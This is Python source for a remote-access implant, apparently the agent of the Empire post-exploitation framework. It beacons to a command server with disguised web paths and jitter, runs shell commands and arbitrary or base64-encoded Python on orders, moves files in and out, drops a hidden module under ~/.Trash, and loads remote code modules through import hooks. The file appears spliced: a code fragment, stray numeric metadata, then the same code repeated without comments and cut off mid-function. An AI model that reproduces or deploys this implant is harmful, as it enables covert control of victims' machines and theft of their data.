build_response_packet(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart,
resultID))
except Exception as e:
# Also return partial code that has been executed
errorData = buffer.getvalue()
send_message(build_response_packet(0,
"error executing specified Python data %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID))
elif packetType == 102:
# on disk code execution for modules that require multiprocessing not supported by exec
try:
implantHome = expanduser("~") + '/.Trash/'
moduleName = ".mac-debug-data"
implantPath = implantHome + moduleName
result = "[*] Module disk path: %s \n" % (implantPath)
with open(implantPath, 'w') as f:
f.write(data)
result += "[*] Module properly dropped to disk \n"
pythonCommand = "python %s" % (implantPath)
process = subprocess.Popen(pythonCommand, stdout=subprocess.PIPE, shell=True)
data = process.communicate()
result += data[0].strip()
try:
os.remove(implantPath)
result += "[*] Module path was properly removed: %s" % (implantPath)
except Exception as e:
print("error removing module filed: %s" % (e))
fileCheck = os.path.isfile(implantPath)
if fileCheck:
result += "\n\nError removing module file, please verify path: " + str(implantPath)
send_message(build_response_packet(100, str(result), resultID))
except Exception as e:
fileCheck = os.path.isfile(implantPath)
if fileCheck:
send_message(build_response_packet(0,
"error executing specified Python data: %s \nError removing module file, please verify path: %s" % (
e, implantPath), resultID))
send_message(build_response_packet(0, "error executing specified Python data: %s" % (e), resultID))
elif packetType == 110:
start_job(data, resultID)
elif packetType == 111:
# TASK_CMD_JOB_SAVE
# TODO: implement job structure
pass
elif packetType == 121:
# base64 decode the script and execute
script = base64.b64decode(data)
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(script, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
result = str(buffer.getvalue())
send_message(build_response_packet(121, result, resultID))
except Exception as e:
errorData = str(buffer.getvalue())
send_message(build_response_packet(0,
"error executing specified Python data %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID))
elif packetType == 122:
# base64 decode and decompress the data
try:
parts = data.split('|')
base64part = parts[1]
fileName = parts[0]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
send_message(build_response_packet(122, "Failed crc32_check during decompression", resultID))
except Exception as e:
send_message(build_response_packet(122, "Unable to decompress zip file: %s" % (e), resultID))
zdata = dec_data['data']
zf = zipfile.ZipFile(io.BytesIO(zdata), "r")
if fileName in list(moduleRepo.keys()):
send_message(build_response_packet(122, "%s module already exists" % (fileName), resultID))
else:
moduleRepo[fileName] = zf
install_hook(fileName)
send_message(build_response_packet(122, "Successfully imported %s" % (fileName), resultID))
elif packetType == 123:
# view loaded modules
repoName = data
if repoName == "":
loadedModules = "\nAll Repos\n"
for key, value in list(moduleRepo.items()):
loadedModules += "\n----" + key + "----\n"
loadedModules += '\n'.join(moduleRepo[key].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
else:
try:
loadedModules = "\n----" + repoName + "----\n"
loadedModules += '\n'.join(moduleRepo[repoName].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
except Exception as e:
msg = "Unable to retrieve repo contents: %s" % (str(e))
send_message(build_response_packet(123, msg, resultID))
elif packetType == 124:
# remove module
repoName = data
try:
remove_hook(repoName)
del moduleRepo[repoName]
send_message(build_response_packet(124, "Successfully remove repo: %s" % (repoName), resultID))
except Exception as e:
send_message(build_response_packet(124, "Unable to remove repo: %s, %s" % (repoName, str(e)), resultID))
else:
send_message(build_response_packet(0, "invalid tasking ID: %s" % (taskingID), resultID))
def old_div(a, b):
"""
Equivalent to ``a / b`` on Python 2 without ``from __future__ import
division``.
"""
if isinstance(a, numbers.Integral) and isinstance(b, numbers.Integral):
return a // b
else:
return a / b
################################################
#
# Custom Import Hook
# #adapted from https://github.com/sulinx/remote_importer
#
################################################
# [0] = .py ext, is_package = False
# [1] = /__init__.py ext, is_package = True
_search_order = [('.py', False), ('/__init__.py', True)]
class ZipImportError(ImportError):
"""Exception raised by zipimporter objects."""
# _get_info() = takes the fullname, then subpackage name (if applicable),
# and searches for the respective module or package
class CFinder(object):
"""Import Hook for Empire"""
def __init__(self, repoName):
self.repoName = repoName
def _get_info(self, repoName, fullname):
"""Search for the respective package or module in the zipfile object"""
parts = fullname.split('.')
submodule = parts[-1]
modulepath = '/'.join(parts)
# check to see if that specific module exists
for suffix, is_package in _search_order:
relpath = modulepath + suffix
try:
moduleRepo[repoName].getinfo(relpath)
except KeyError:
pass
else:
return submodule, is_package, relpath
# Error out if we can find the module/package
msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
raise ZipImportError(msg)
def _get_source(self, repoName, fullname):
"""Get the source code for the requested module"""
submodule, is_package, relpath = self._get_info(repoName, fullname)
fullpath = '%s/%s' % (repoName, relpath)
source = moduleRepo[repoName].read(relpath)
source = source.replace('\r\n', '\n')
source = source.replace('\r', '\n')
return submodule, is_package, fullpath, source
def find_module(self, fullname, path=None):
try:
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
except ImportError:
return None
else:
return self
def load_module(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
code = compile(source, fullpath, 'exec')
mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))
mod.__loader__ = self
mod.__file__ = fullpath
mod.__name__ = fullname
if is_package:
mod.__path__ = [os.path.dirname(mod.__file__)]
exec(code, mod.__dict__)
return mod
def get_data(self, fullpath):
prefix = os.path.join(self.repoName, '')
if not fullpath.startswith(prefix):
raise IOError('Path %r does not start with module name %r', (fullpath, prefix))
relpath = fullpath[len(prefix):]
try:
return moduleRepo[self.repoName].read(relpath)
except KeyError:
raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def is_package(self, fullname):
"""Return if the module is a package"""
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
return is_package
def get_code(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
return compile(source, fullpath, 'exec')
def install_hook(repoName):
if repoName not in _meta_cache:
finder = CFinder(repoName)
_meta_cache[repoName] = finder
sys.meta_path.append(finder)
def remove_hook(repoName):
if repoName in _meta_cache:
finder = _meta_cache.pop(repoName)
sys.meta_path.remove(finder)
################################################
#
# misc methods
#
################################################
class compress(object):
'''
Base clase for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def comp_data(self, data, cvalue=COMP_RATIO):
'''
Takes in a string and computes
the comp obj.
data = string wanting compression
cvalue = 0-9 comp value (default 6)
'''
cdata = zlib.compress(data, cvalue)
return cdata
def crc32_data(self, data):
'''
Takes in a string and computes crc32 value.
data = string before compression
returns:
HEX bytes of data
'''
crc = zlib.crc32(data) & 0xFFFFFFFF
return crc
def build_header(self, data, crc):
'''
Takes comp data, org crc32 value,
and adds self header.
data = comp data
crc = crc32 value
'''
header = struct.pack("!I", crc)
built_data = header + data
return built_data
class decompress(object):
'''
Base clase for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def dec_data(self, data, cheader=True):
'''
Takes:
Custom / standard header data
data = comp data with zlib header
BOOL cheader = passing custom crc32 header
returns:
dict with crc32 cheack and dec data string
ex. {"crc32" : true, "dec_data" : "-SNIP-"}
'''
if cheader:
comp_crc32 = struct.unpack("!I", data[:self.CRC_HSIZE])[0]
dec_data = zlib.decompress(data[self.CRC_HSIZE:])
dec_crc32 = zlib.crc32(dec_data) & 0xFFFFFFFF
if comp_crc32 == dec_crc32:
crc32 = True
else:
crc32 = False
return {"header_crc32": comp_crc32, "dec_crc32": dec_crc32, "crc32_check": crc32, "data": dec_data}
else:
dec_data = zlib.decompress(data)
return dec_data
def agent_exit():
# exit for proper job / thread cleanup
if len(jobs) > 0:
try:
for x in jobs:
jobs[int(x)].kill()
jobs.pop(x)
except:
# die hard if thread kill fails
pass
exit()
def indent(lines, amount=4, ch=' '):
padding = amount * ch
return padding + ('\n' + padding).join(lines.split('\n'))
# from http://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
class ThreadWithReturnValue(Thread):
def __init__(self, group=None, target=None, name=None,
args=(), kwargs={}, Verbose=None):
Thread.__init__(self, group, target, name, args, kwargs, Verbose)
self._return = None
def run(self):
if self._Thread__target is not None:
self._return = self._Thread__target(*self._Thread__args,
**self._Thread__kwargs)
def join(self):
Thread.join(self)
return self._return
class KThread(threading.Thread):
"""A subclass of threading.Thread, with a kill()
method."""
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.killed = False
def start(self):
"""Start the thread."""
self.__run_backup = self.run
self.run = self.__run # Force the Thread toinstall our trace.
threading.Thread.start(self)
def __run(self):
"""Hacked run function, which installs the
trace."""
sys.settrace(self.globaltrace)
self.__run_backup()
self.run = self.__run_backup
def globaltrace(self, frame, why, arg):
if why == 'call':
return self.localtrace
else:
return None
def localtrace(self, frame, why, arg):
if self.killed:
if why == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.killed = True
def start_job(code, resultID):
global jobs
# create a new code block with a defined method name
codeBlock = "def method():\n" + indent(code[1:])
# register the code block
code_obj = compile(codeBlock, '<string>', 'exec')
# code needs to be in the global listing
# not the locals() scope
exec(code_obj, globals())
# create/process Packet start/return the thread
# call the job_func so sys data can be captured
codeThread = KThread(target=job_func, args=(resultID,))
codeThread.start()
jobs.append(codeThread)
def job_func(resultID):
try:
buffer = StringIO()
sys.stdout = buffer
# now call the function required
# and capture the output via sys
method()
sys.stdout = sys.__stdout__
dataStats_2 = buffer.getvalue()
result = build_response_packet(110, str(dataStats_2), resultID)
process_job_tasking(result)
except Exception as e:
p = "error executing specified Python job data: " + str(e)
result = build_response_packet(0, p, resultID)
process_job_tasking(result)
def job_message_buffer(message):
# Supports job messages for checkin
global jobMessageBuffer
try:
jobMessageBuffer += str(message)
except Exception as e:
print(e)
def get_job_message_buffer():
global jobMessageBuffer
try:
result = build_response_packet(110, str(jobMessageBuffer))
jobMessageBuffer = ""
return result
except Exception as e:
return build_response_packet(0, "[!] Error getting job output: %s" % (e))
def send_job_message_buffer():
if len(jobs) > 0:
result = get_job_message_buffer()
process_job_tasking(result)
else:
pass
def start_webserver(data, ip, port, serveCount):
# thread data_webserver for execution
t = threading.Thread(target=data_webserver, args=(data, ip, port, serveCount))
t.start()
return
def data_webserver(data, ip, port, serveCount):
# hosts a file on port and IP servers data string
hostName = str(ip)
portNumber = int(port)
data = str(data)
serveCount = int(serveCount)
count = 0
class serverHandler(http.server.BaseHTTPRequestHandler):
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(data)
def log_message(s, format, *args):
return
server_class = http.server.HTTPServer
httpServer = server_class((hostName, portNumber), serverHandler)
try:
while (count < serveCount):
httpServer.handle_request()
count += 1
except:
pass
httpServer.server_close()
return
def permissions_to_unix_name(st_mode):
permstr = ''
usertypes = ['USR', 'GRP', 'OTH']
for usertype in usertypes:
perm_types = ['R', 'W', 'X']
for permtype in perm_types:
perm = getattr(stat, 'S_I%s%s' % (permtype, usertype))
if st_mode & perm:
permstr += permtype.lower()
else:
permstr += '-'
return permstr
def directory_listing(path):
# directory listings in python
# https://www.opentechguides.com/how-to/article/python/78/directory-file-list.html
res = ""
for fn in os.listdir(path):
fstat = os.stat(os.path.join(path, fn))
permstr = permissions_to_unix_name(fstat[0])
if os.path.isdir(fn):
permstr = "d{}".format(permstr)
else:
permstr = "-{}".format(permstr)
user = pwd.getpwuid(fstat.st_uid)[0]
group = grp.getgrgid(fstat.st_gid)[0]
# Convert file size to MB, KB or Bytes
if (fstat.st_size > 1024 * 1024):
fsize = math.ceil(old_div(fstat.st_size, (1024 * 1024)))
unit = "MB"
elif (fstat.st_size > 1024):
fsize = math.ceil(old_div(fstat.st_size, 1024))
unit = "KB"
else:
fsize = fstat.st_size
unit = "B"
mtime = time.strftime("%X %x", time.gmtime(fstat.st_mtime))
res += '{} {} {} {:18s} {:f} {:2s} {:15.15s}\n'.format(permstr, user, group, mtime, fsize, unit, fn)
return res
# additional implementation methods
def run_command(command, cmdargs=None):
if re.compile("(ls|dir)").match(command):
if cmdargs == None or not os.path.exists(cmdargs):
cmdargs = '.'
return directory_listing(cmdargs)
if re.compile("cd").match(command):
os.chdir(cmdargs)
return str(os.getcwd())
elif re.compile("pwd").match(command):
return str(os.getcwd())
elif re.compile("rm").match(command):
if cmdargs == None:
return "please provide a file or directory"
if os.path.exists(cmdargs):
if os.path.isfile(cmdargs):
os.remove(cmdargs)
return "done."
elif os.path.isdir(cmdargs):
shutil.rmtree(cmdargs)
return "done."
else:
return "unsupported file type"
else:
return "specified file/directory does not exist"
elif re.compile("mkdir").match(command):
if cmdargs == None:
return "please provide a directory"
os.mkdir(cmdargs)
return "Created directory: {}".format(cmdargs)
elif re.compile("(whoami|getuid)").match(command):
return pwd.getpwuid(os.getuid())[0]
elif re.compile("hostname").match(command):
return str(socket.gethostname())
else:
if cmdargs != None:
command = "{} {}".format(command, cmdargs)
p = subprocess.Popen(command, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
return p.communicate()[0].strip().decode('UTF-8')
def get_file_part(filePath, offset=0, chunkSize=512000, base64=True):
if not os.path.exists(filePath):
return ''
f = open(filePath, 'rb')
f.seek(offset, 0)
data = f.read(chunkSize)
f.close()
if base64:
return base64.b64encode(data)
else:
return data
################################################
#
# main agent functionality
#
################################################
while (True):
try:
if workingHours != '' and 'WORKINGHOURS' not in workingHours:
try:
start, end = workingHours.split('-')
now = datetime.datetime.now()
startTime = datetime.datetime.strptime(start, "%H:%M")
endTime = datetime.datetime.strptime(end, "%H:%M")
if not (startTime <= now <= endTime):
sleepTime = startTime - now
# sleep until the start of the next window
time.sleep(sleepTime.seconds)
except Exception as e:
pass
# check if we're past the killdate for this agent
# killDate form -> MO/DAY/YEAR
if killDate != "" and 'KILLDATE' not in killDate:
now = datetime.datetime.now().date()
try:
killDateTime = datetime.datetime.strptime(killDate, "%m/%d/%Y").date()
except:
pass
if now >= killDateTime:
msg = "[!] Agent %s exiting" % (sessionID)
send_message(build_response_packet(2, msg))
agent_exit()
# exit if we miss commnicating with the server enough times
if missedCheckins >= lostLimit:
agent_exit()
# sleep for the randomized interval
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1, jitter)
minSleep = int((1.0 - jitter) * delay)
maxSleep = int((1.0 + jitter) * delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
(code, data) = send_message()
if code == '200':
try:
send_job_message_buffer()
except Exception as e:
result = build_response_packet(0, str('[!] Failed to check job buffer!: ' + str(e)))
process_job_tasking(result)
if data.strip() == defaultResponse.strip():
missedCheckins = 0
else:
decode_routing_packet(data)
else:
pass
# print "invalid code:",code
except Exception as e:
print("main() exception: %s" % (e))
| 33.6215
| 151
| 0.563422
|
import json
import struct
import base64
import subprocess
import random
import time
import datetime
import os
import sys
import zlib
import threading
import http.server
import zipfile
import io
import types
import re
import shutil
import pwd
import socket
import math
import stat
import grp
import numbers
from os.path import expanduser
from io import StringIO
from threading import Thread
profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
if server.endswith("/"): server = server[0:-1]
delay = 60
jitter = 0.0
lostLimit = 60
missedCheckins = 0
jobMessageBuffer = ''
currentListenerName = ""
sendMsgFuncCode = ""
proxy_list = []
killDate = 'REPLACE_KILLDATE'
workingHours = 'REPLACE_WORKINGHOURS'
parts = profile.split('|')
taskURIs = parts[0].split(',')
userAgent = parts[1]
headersRaw = parts[2:]
defaultResponse = base64.b64decode("")
jobs = []
moduleRepo = {}
_meta_cache = {}
headers = {'User-Agent': userAgent}
for headerRaw in headersRaw:
try:
headerKey = headerRaw.split(":")[0]
headerValue = headerRaw.split(":")[1]
if headerKey.lower() == "cookie":
headers['Cookie'] = "%s;%s" % (headers['Cookie'], headerValue)
else:
headers[headerKey] = headerValue
except:
pass
REPLACE_COMMS
def decode_routing_packet(data):
packets = parse_routing_packet(stagingKey, data)
if packets is None:
return
for agentID, packet in packets.items():
if agentID == sessionID:
(language, meta, additional, encData) = packet
process_tasking(encData)
else:
pass
def build_response_packet(taskingID, packetData, resultID=0):
packetType = struct.pack('=H', taskingID)
totalPacket = struct.pack('=H', 1)
packetNum = struct.pack('=H', 1)
resultID = struct.pack('=H', resultID)
if packetData:
if (isinstance(packetData, str)):
packetData = base64.b64encode(packetData.encode('utf-8', 'ignore'))
else:
packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8', 'ignore'))
if len(packetData) % 4:
packetData += '=' * (4 - len(packetData) % 4)
length = struct.pack('=L', len(packetData))
return packetType + totalPacket + packetNum + resultID + length + packetData
else:
length = struct.pack('=L', 0)
return packetType + totalPacket + packetNum + resultID + length
def parse_task_packet(packet, offset=0):
try:
packetType = struct.unpack('=H', packet[0 + offset:2 + offset])[0]
totalPacket = struct.unpack('=H', packet[2 + offset:4 + offset])[0]
packetNum = struct.unpack('=H', packet[4 + offset:6 + offset])[0]
resultID = struct.unpack('=H', packet[6 + offset:8 + offset])[0]
length = struct.unpack('=L', packet[8 + offset:12 + offset])[0]
packetData = packet[12 + offset:12 + offset + length].decode('UTF-8')
remainingData = packet[12 + offset + length:].decode('UTF-8')
return (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData)
except Exception as e:
print("parse_task_packet exception:", e)
return (None, None, None, None, None, None, None)
def process_tasking(data):
try:
tasking = aes_decrypt_and_verify(key, data).encode('UTF-8')
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking)
missedCheckins = 0
resultPackets = ""
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset = 12 + length
while remainingData and remainingData != '':
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking,
offset=packetOffset)
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset += 12 + length
send_message(resultPackets)
except Exception as e:
pass
def process_job_tasking(result):
try:
resultPackets = b""
if result:
resultPackets += result
send_message(resultPackets)
except Exception as e:
print("processJobTasking exception:", e)
pass
def process_packet(packetType, data, resultID):
try:
packetType = int(packetType)
except Exception as e:
return None
if packetType == 1:
send_message(build_response_packet(1, get_sysinfo(), resultID))
elif packetType == 2:
send_message(build_response_packet(2, "", resultID))
agent_exit()
elif packetType == 34:
proxy_list = json.loads(data)
update_proxychain(proxy_list)
elif packetType == 40:
parts = data.split(" ")
if len(parts) == 1:
data = parts[0]
resultData = str(run_command(data))
send_message(build_response_packet(40, resultData, resultID))
else:
cmd = parts[0]
cmdargs = ' '.join(parts[1:len(parts)])
resultData = str(run_command(cmd, cmdargs=cmdargs))
send_message(build_response_packet(40, resultData, resultID))
elif packetType == 41:
objPath = os.path.abspath(data)
fileList = []
if not os.path.exists(objPath):
send_message(build_response_packet(40, "file does not exist or cannot be accessed", resultID))
if not os.path.isdir(objPath):
fileList.append(objPath)
else:
for folder, subs, files in os.walk(objPath):
for filename in files:
if os.path.exists(objPath):
fileList.append(objPath + "/" + filename)
for filePath in fileList:
offset = 0
size = os.path.getsize(filePath)
partIndex = 0
while True:
encodedPart = get_file_part(filePath, offset=offset, base64=False)
c = compress()
start_crc32 = c.crc32_data(encodedPart)
comp_data = c.comp_data(encodedPart)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
partData = "%s|%s|%s|%s" % (partIndex, filePath, size, encodedPart)
if not encodedPart or encodedPart == '' or len(encodedPart) == 16:
break
send_message(build_response_packet(41, partData, resultID))
global delay
global jitter
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1, jitter)
minSleep = int((1.0 - jitter) * delay)
maxSleep = int((1.0 + jitter) * delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 512000
elif packetType == 42:
try:
parts = data.split("|")
filePath = parts[0]
base64part = parts[1]
raw = base64.b64decode(base64part)
with open(filePath, 'ab') as f:
f.write(raw)
send_message(build_response_packet(42, "[*] Upload of %s successful" % (filePath), resultID))
except Exception as e:
send_message(build_response_packet(0, "[!] Error in writing file %s during upload: %s" % (filePath, str(e)), resultID))
elif packetType == 43:
cmdargs = data
path = '/' if cmdargs is not None and cmdargs != '' and cmdargs != '/': path = cmdargs.rstrip('/')
if path[0] != '/': path = '/{0}'.format(path)
if not os.path.isdir(path):
send_message(build_response_packet(43, 'Directory {} not found.'.format(path), resultID))
items = []
with os.scandir(path) as it:
for entry in it:
items.append({'path': entry.path, 'name': entry.name, 'is_file': entry.is_file()})
result_data = json.dumps({
'directory_name': path if len(path) == 1 else path.split('/')[-1],
'directory_path': path,
'items': items
})
send_message(build_response_packet(43, result_data, resultID))
elif packetType == 50:
msg = ""
if len(jobs) == 0:
msg = "No active jobs"
else:
msg = "Active jobs:\n"
for x in range(len(jobs)):
msg += "\t%s" % (x)
send_message(build_response_packet(50, msg, resultID))
elif packetType == 51:
try:
# Calling join first seems to hang
# result = jobs[int(data)].join()
send_message(build_response_packet(0, "[*] Attempting to stop job thread", resultID))
result = jobs[int(data)].kill()
send_message(build_response_packet(0, "[*] Job thread stoped!", resultID))
jobs[int(data)]._Thread__stop()
jobs.pop(int(data))
if result and result != "":
send_message(build_response_packet(51, result, resultID))
except:
return build_response_packet(0, "error stopping job: %s" % (data), resultID)
elif packetType == 100:
# dynamic code execution, wait for output, don't save outputPicl
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue()
send_message(build_response_packet(100, str(results), resultID))
except Exception as e:
errorData = str(buffer.getvalue())
return build_response_packet(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID)
elif packetType == 101:
prefix = data[0:15].strip()
extension = data[15:20].strip()
data = data[20:]
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue().encode('latin-1')
c = compress()
start_crc32 = c.crc32_data(results)
comp_data = c.comp_data(results)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
send_message(
build_response_packet(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart,
resultID))
except Exception as e:
errorData = buffer.getvalue()
send_message(build_response_packet(0,
"error executing specified Python data %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID))
elif packetType == 102:
try:
implantHome = expanduser("~") + '/.Trash/'
moduleName = ".mac-debug-data"
implantPath = implantHome + moduleName
result = "[*] Module disk path: %s \n" % (implantPath)
with open(implantPath, 'w') as f:
f.write(data)
result += "[*] Module properly dropped to disk \n"
pythonCommand = "python %s" % (implantPath)
process = subprocess.Popen(pythonCommand, stdout=subprocess.PIPE, shell=True)
data = process.communicate()
result += data[0].strip()
try:
os.remove(implantPath)
result += "[*] Module path was properly removed: %s" % (implantPath)
except Exception as e:
print("error removing module filed: %s" % (e))
fileCheck = os.path.isfile(implantPath)
if fileCheck:
result += "\n\nError removing module file, please verify path: " + str(implantPath)
send_message(build_response_packet(100, str(result), resultID))
except Exception as e:
fileCheck = os.path.isfile(implantPath)
if fileCheck:
send_message(build_response_packet(0,
"error executing specified Python data: %s \nError removing module file, please verify path: %s" % (
e, implantPath), resultID))
send_message(build_response_packet(0, "error executing specified Python data: %s" % (e), resultID))
elif packetType == 110:
start_job(data, resultID)
elif packetType == 111:
pass
elif packetType == 121:
script = base64.b64decode(data)
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(script, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
result = str(buffer.getvalue())
send_message(build_response_packet(121, result, resultID))
except Exception as e:
errorData = str(buffer.getvalue())
send_message(build_response_packet(0,
"error executing specified Python data %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID))
elif packetType == 122:
try:
parts = data.split('|')
base64part = parts[1]
fileName = parts[0]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
send_message(build_response_packet(122, "Failed crc32_check during decompression", resultID))
except Exception as e:
send_message(build_response_packet(122, "Unable to decompress zip file: %s" % (e), resultID))
zdata = dec_data['data']
zf = zipfile.ZipFile(io.BytesIO(zdata), "r")
if fileName in list(moduleRepo.keys()):
send_message(build_response_packet(122, "%s module already exists" % (fileName), resultID))
else:
moduleRepo[fileName] = zf
install_hook(fileName)
send_message(build_response_packet(122, "Successfully imported %s" % (fileName), resultID))
elif packetType == 123:
repoName = data
if repoName == "":
loadedModules = "\nAll Repos\n"
for key, value in list(moduleRepo.items()):
loadedModules += "\n----" + key + "----\n"
loadedModules += '\n'.join(moduleRepo[key].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
else:
try:
loadedModules = "\n----" + repoName + "----\n"
loadedModules += '\n'.join(moduleRepo[repoName].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
except Exception as e:
msg = "Unable to retrieve repo contents: %s" % (str(e))
send_message(build_response_packet(123, msg, resultID))
elif packetType == 124:
repoName = data
try:
remove_hook(repoName)
del moduleRepo[repoName]
send_message(build_response_packet(124, "Successfully remove repo: %s" % (repoName), resultID))
except Exception as e:
send_message(build_response_packet(124, "Unable to remove repo: %s, %s" % (repoName, str(e)), resultID))
else:
send_message(build_response_packet(0, "invalid tasking ID: %s" % (taskingID), resultID))
def old_div(a, b):
if isinstance(a, numbers.Integral) and isinstance(b, numbers.Integral):
return a // b
else:
return a / b
_search_order = [('.py', False), ('/__init__.py', True)]
class ZipImportError(ImportError):
class CFinder(object):
def __init__(self, repoName):
self.repoName = repoName
def _get_info(self, repoName, fullname):
parts = fullname.split('.')
submodule = parts[-1]
modulepath = '/'.join(parts)
for suffix, is_package in _search_order:
relpath = modulepath + suffix
try:
moduleRepo[repoName].getinfo(relpath)
except KeyError:
pass
else:
return submodule, is_package, relpath
msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
raise ZipImportError(msg)
def _get_source(self, repoName, fullname):
submodule, is_package, relpath = self._get_info(repoName, fullname)
fullpath = '%s/%s' % (repoName, relpath)
source = moduleRepo[repoName].read(relpath)
source = source.replace('\r\n', '\n')
source = source.replace('\r', '\n')
return submodule, is_package, fullpath, source
def find_module(self, fullname, path=None):
try:
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
except ImportError:
return None
else:
return self
def load_module(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
code = compile(source, fullpath, 'exec')
mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))
mod.__loader__ = self
mod.__file__ = fullpath
mod.__name__ = fullname
if is_package:
mod.__path__ = [os.path.dirname(mod.__file__)]
exec(code, mod.__dict__)
return mod
def get_data(self, fullpath):
prefix = os.path.join(self.repoName, '')
if not fullpath.startswith(prefix):
raise IOError('Path %r does not start with module name %r', (fullpath, prefix))
relpath = fullpath[len(prefix):]
try:
return moduleRepo[self.repoName].read(relpath)
except KeyError:
raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def is_package(self, fullname):
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
return is_package
def get_code(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
return compile(source, fullpath, 'exec')
def install_hook(repoName):
if repoName not in _meta_cache:
finder = CFinder(repoName)
_meta_cache[repoName] = finder
sys.meta_path.append(finder)
def remove_hook(repoName):
if repoName in _meta_cache:
finder = _meta_cache.pop(repoName)
sys.meta_path.remove(finder)
class compress(object):
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
pass
def comp_data(self, data, cvalue=COMP_RATIO):
cdata = zlib.compress(data, cvalue)
return cdata
def crc32_data(self, data):
crc = zlib.crc32(data) & 0xFFFFFFFF
return crc
def build_header(self, data, crc):
header = struct.pack("!I", crc)
built_data = header + data
return built_data
class decompress(object):
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
pass
def dec_data(self, data, cheader=True):
if cheader:
comp_crc32 = struct.unpack("!I", data[:self.CRC_HSIZE])[0]
dec_data = zlib.decompress(data[self.CRC_HSIZE:])
dec_crc32 = zlib.crc32(dec_data) & 0xFFFFFFFF
if comp_crc32 == dec_crc32:
crc32 = True
else:
crc32 = False
return {"header_crc32": comp_crc32, "dec_crc32": dec_crc32, "crc32_check": crc32, "data": dec_data}
else:
dec_data = zlib.decompress(data)
return dec_data
def agent_exit():
if len(jobs) > 0:
try:
for x in jobs:
jobs[int(x)].kill()
jobs.pop(x)
except:
pass
exit()
def indent(lines, amount=4, ch=' '):
padding = amount * ch
return padding + ('\n' + padding).join(lines.split('\n'))
class ThreadWithReturnValue(Thread):
def __init__(self, group=None, target=None, name=None,
args=(), kwargs={}, Verbose=None):
Thread.__init__(self, group, target, name, args, kwargs, Verbose)
self._return = None
def run(self):
if self._Thread__target is not None:
self._return = self._Thread__target(*self._Thread__args,
**self._Thread__kwargs)
def join(self):
Thread.join(self)
return self._return
class KThread(threading.Thread):
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.killed = False
def start(self):
self.__run_backup = self.run
self.run = self.__run threading.Thread.start(self)
def __run(self):
sys.settrace(self.globaltrace)
self.__run_backup()
self.run = self.__run_backup
def globaltrace(self, frame, why, arg):
if why == 'call':
return self.localtrace
else:
return None
def localtrace(self, frame, why, arg):
if self.killed:
if why == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.killed = True
def start_job(code, resultID):
